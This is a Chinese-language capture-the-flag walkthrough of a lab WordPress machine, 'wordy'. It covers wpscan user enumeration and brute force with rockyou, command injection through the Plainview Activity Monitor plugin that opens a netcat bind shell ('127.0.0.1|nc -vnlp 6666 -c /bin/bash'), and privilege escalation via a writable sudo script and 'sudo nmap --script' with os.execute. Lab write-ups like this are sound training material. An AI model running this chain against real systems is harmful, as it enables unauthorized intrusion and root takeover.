这是一个利用wordpress插件漏洞提权的一个靶场,感觉还行叭,前面作者也在题目中给足了思路,要用到rockyou字典,一看是wordpress,思路就是拿到该站点用 wpscan 得到用户名,然后再用 wpscan 配合字典得到密码,后面提权视具体情况而定

nmap -sn 192.168.67.99:获取到目标地址 192.168.67.99
nmap -A -p- 192.168.67.99 :获取到目标地址系统信息及开放端口信息 22 80
既然给了 22 端口那么极有可能会用到...

浏览器查看下http://192.168.67.99发现登陆不上去,页面会跳转到http://wordy,于是修改一下到 /etc/hosts 增添一条规则,将 192.168.67.99 解析到 http://wordy
1592901060(1).png
再次打开 http://wordy 查看,这界面一看就是 wordpress 老规矩,wapplayzer 查看一下,是 wordpress 5.1.1 版本[新版本],根据题目提示[刚开始没有看到提示,直接 cewl 收集了一波,然后 wpscan 查了下用户名,rockyou 字典有点大...跑起来很费时]

一边跑下有哪些有户名,一边把字典搞过来
wpscan --url http://wordy -e u
cp /usr/share/wordlists/rockyou.txt.gz /root/ --> 解压,得到 rockyou.txt
cat rockyou.txt | grep k01 > pwd.txt

得到五个用户名:admin mark graham sarah jens,保存到 name.txt
wpscan 跑密码: wpscan --url http://wordy -U name.txt -P pwd.txt
得到 mark 的密码: helpdesk01
尝试 ssh 登陆,登陆失败
于是 web 登陆,也没看到有什么东西可搞,wordpress 最常爆漏洞的地方就是插件了,那就枚举一下该站都有哪些插件

wpscan --url http://wordy --plugins-detection aggressive

发现有两个插件不是最新版本的,看看这两个插件有无可利用的
searchsploit Plugin Plainview Activity
WordPress Plugin Plainview Activity Monitor 20161228 - (Auth | php/webapps/45274.html
cp /usr/share/exploitdb/exploit/php/webapps/45274.html /root/a.html
vim a.html修改
cp a.html /var/www/html/
service apache2 start
kali这边:nc 192.168.67.99 9999
1592903183(1).png

访问 http://192.168.67.221/a.html,点击 submit request 提交,页面跳转,但是没有反应,提示 connection refused

那就尝试提交一下
710cd7f88be0f50a35d682c7bd86b49.png
dbcc36e7d57efce87cccbbf8514793b.png
可看到命令正常执行,F12 修改一下max length,把 15 改成 1000,然后输入
127.0.0.1|nc -vnlp 6666 -c /bin/bash
nc 192.168.67.99 6666 --> kali这边接shell

成功拿到 shell,加个壳
python -c 'import pty;pty.spawn("/bin/bash")'
cd /home/mark
ls
cd stuff
cat things-to-do.txt

得到 graham 的密码:
- Add new user: graham - GSo7isUM1D4 - done

ssh 登陆一波:
ssh graham@192.168.67.99
yes
GSo7isUM1D4

ls --> 没有东西
sudo -l --> 查看有无过权东西
有:/home/jens/backups.sh

既然该 shell 脚本可以以 jens 权限,那就写点东西进去,
cat /home/jens/backups.sh
vi /home/jens/backups.sh
#!/bin/bash
/bin/bash
cat /home/jens/backups.sh
cd /home/jens
sudo -u jens ./backups.sh

这就来到了 jens 的环节:
ls
sudo -l:发现有 /usr/bin/nmap
众所周知 nmap 可以启用脚本:那执行个系统命令岂不可以拿到 root 权限?
echo 'os.execute("/bin/bash")' > SHELL -->注意引号的使用
sudo /usr/bin/nmap --script SHELL
id
ls /root/
cat /root/the/flag.txt

1592904898(1).png

总结:
1.密码破解
2.漏洞利用
3.提权
4.细心
5.简单脚本